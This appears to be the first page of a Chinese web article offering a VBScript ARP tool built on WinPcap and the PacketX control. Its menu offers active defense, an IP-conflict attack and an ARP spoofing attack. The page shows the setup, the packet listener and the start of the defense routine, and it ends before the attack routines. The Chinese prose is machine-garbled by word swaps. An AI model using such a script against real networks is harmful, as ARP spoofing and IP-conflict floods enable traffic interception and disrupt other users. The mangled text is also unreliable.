操纵VBS脚本来实现ARP攻击[网络技术]

'利用前安装WINPCAP3.1与下载packetx控件安装
'WINPCAP3.1自解紧缩安装下载地址http://www.ntbak.cn/WINPCAP3.1.exe
'packetx控件下载地址http://www.beesync.com/packetx/index.html
'利用办法:cscript.exe name.vbs
'code by 伤头脑
 
if (lcase(right(wscript.fullname,11))="wscript.exe") then '判断脚本宿主的名称
    names=""""
    wscript.echo "请利用CScript.exe " & names &  WScript.ScriptFullName  & names & " 调用脚本履行!"
    wscript.quit
end if
 
if wscript.arguments.count>=1 then    '判断有没有参数
    wscript.echo ("本程序不能带参数运行,请将参数去掉!")
    wscript.quit
end if
 
Set oPktX = WScript.CreateObject("PktX.PacketX","PacketX_")  '成立控件
const PktXProtocolTypeEthernet = 1   '定义以太网报文常量
set shellrun = WScript.createobject("wscript.shell")   '定义履行外部号令组件
dim var,gatawayip,sendtime,atip,mans   '定义全局变量
mans=0
 
wscript.echo "1:举行主动防备"
wscript.echo "2:举行IP冲突攻击"
wscript.echo "3:举行ARP拐骗攻击"
wscript.echo ""
wscript.echo ""
WScript.StdOut.Write "请挑选序号举行操作# "
select case trim(WScript.StdIn.ReadLine)
    case "1"
        Defense      '举行主动防备
    case "2"
        Attack       '举行IP冲突攻击
    case "3"
        Deception    '举行ARP拐骗攻击
end select
 
Public Sub PacketX_OnPacket(ByRef oPacket)      '开始监听报解码报文历程
    if oPacket.Protocol = PktXProtocolTypeEthernet _
        and oPacket.SourceMacAddress <> oPktX.Adapter.HWAddress _
        and oPacket.DestMacAddress <> "FF:FF:FF:FF:FF:FF" then
        var=oPacket.SourceMacAddress      '获得应答报文的源MAC地址
        if sourmac = "" and mans=0 then
            mans=1
            sourmac=Split(var, ":", -1, 1)
          
        end if
        WScript.Echo  "源MAC" &vbTab& _
        oPacket.SourceMacAddress &vbTab& "=> " & _
        "目的MAC" &vbTab& oPacket.DestMacAddress
        oPktX.stop
    end if
    exit sub
End Sub
 
sub Defense()    '举行主动防备历程
readdrives    '调用挑选收发报文网卡历程
WScript.StdOut.Write "请输入本机网关IP地址: "
gatawayip = trim(WScript.StdIn.ReadLine)
sHWAddr = oPktX.Adapter.HWAddress '得到本机MAC
loaclip = oPktX.Adapter.NETIP '得到本机IP
tomacs="FFFFFFFFFFFF"    '定义目的MAC地址
oPktX.Start  '开始监听报文
call sendmes(gatawayip,tomacs,loaclip,sHWAddr,"1")  '调用构造发送ARP报文历程
wscript.sleep(1000)   '监听时间1400ms
'oPktX.stop  '终止监听报文
 
var2=(Replace(var,":","-"))
wscript.echo ""
wscript.echo ""
wscript.echo "程序检测出的网关: " & gatawayip & " 的MAC地址为: " &  var2
wscript.echo "您要举行静太绑定吗?假如存在大量ARP攻击,这个检测大概是错误的."
wscript.echo "10秒后开始主动防备 退出请按CTRL+C"
wscript.echo ""
wscript.echo ""

[1] [2] [3]  下一页